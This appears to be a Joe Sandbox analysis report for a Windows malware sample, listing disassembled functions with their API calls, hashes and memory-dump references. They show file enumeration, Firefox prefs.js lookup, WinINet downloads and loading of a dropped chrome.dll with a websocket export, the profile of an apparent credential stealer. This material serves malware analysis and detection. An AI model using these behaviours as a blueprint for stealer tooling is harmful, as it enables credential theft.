                                                                                                                                                                                                                                                                                                                                  • String ID: D$Pz
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1347862506-1236220966
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9cdb33b669921eeb5b2473449912cc7c491f082ff9ff2462b9f626f299741e0a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cdb33b669921eeb5b2473449912cc7c491f082ff9ff2462b9f626f299741e0a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55
                                                                                                                                                                                                                                                                                                                                  Function 004140F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00414113
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0041412A
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 004142D1
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: %s\%s
                                                                                                                                                                                                                                                                                                                                  • API String ID: 180737720-4073750446
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5a12732127472389b6489b51116a8a9f496a8d8297d80430c0ee641d9bc57a78
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a12732127472389b6489b51116a8a9f496a8d8297d80430c0ee641d9bc57a78
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59
                                                                                                                                                                                                                                                                                                                                  Function 00405000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82networkmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
                                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00405021
                                                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
                                                                                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
                                                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
                                                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(+aA), ref: 00405109
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405116
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: +aA$+aA
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1008454911-2425922966
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 848b3e62462d1a25213c5277b7ce8d2e3325390eb46364f49526dc1fd588dc43
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 848b3e62462d1a25213c5277b7ce8d2e3325390eb46364f49526dc1fd588dc43
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D
                                                                                                                                                                                                                                                                                                                                  Function 0040F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040FBB1
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040FBC3
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: prefs.js
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3334442632-3783873740
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 94fb72083331d5d2eb9cff7e731c1b413651461ba3bcbc19546153fbe8d32c8c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94fb72083331d5d2eb9cff7e731c1b413651461ba3bcbc19546153fbe8d32c8c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A
                                                                                                                                                                                                                                                                                                                                  Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,00401F6C,?,004252EC,?,?,00000000,?,00000000), ref: 00401963
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425394), ref: 004019B3
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042543C), ref: 004019C9
                                                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
                                                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00401E0A
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00401E72
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1415058207-1173974218
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c5f9c781e04b5b6a8498d7f6f97a24e71a6d8b830d20e75b0705ca609c908bc3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a576ed9f26fd673c6d53a896fc8188a2a0655e62510251b9f9068b5a07b58df1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5f9c781e04b5b6a8498d7f6f97a24e71a6d8b830d20e75b0705ca609c908bc3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45125071A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9
                                                                                                                                                                                                                                                                                                                                  Function 0040DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040DECC
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040DEDE
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3334442632-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b003d6874901b5ad821d2ea4cb8905c221ed6eb1bc38d96d061459889ca1ecbb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b003d6874901b5ad821d2ea4cb8905c221ed6eb1bc38d96d061459889ca1ecbb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A
                                                                                                                                                                                                                                                                                                                                  Function 0040E530 Relevance: 12.8, APIs: 4, Strings: 3, Instructions: 514fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: 0z$\*.*$@
                                                                                                                                                                                                                                                                                                                                  • API String ID: 433455689-1569546742
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e5ca85308c9bad9515e61675c9f320b8c2097888d48091a0e7caba83a9fa2d9b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5ca85308c9bad9515e61675c9f320b8c2097888d48091a0e7caba83a9fa2d9b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A
                                                                                                                                                                                                                                                                                                                                  Function 0040A090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CF70000,connect_to_websocket), ref: 0040A0BE
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CF70000,free_result), ref: 0040A0D5
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(6CF70000,?,004108E4), ref: 0040A0F9
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
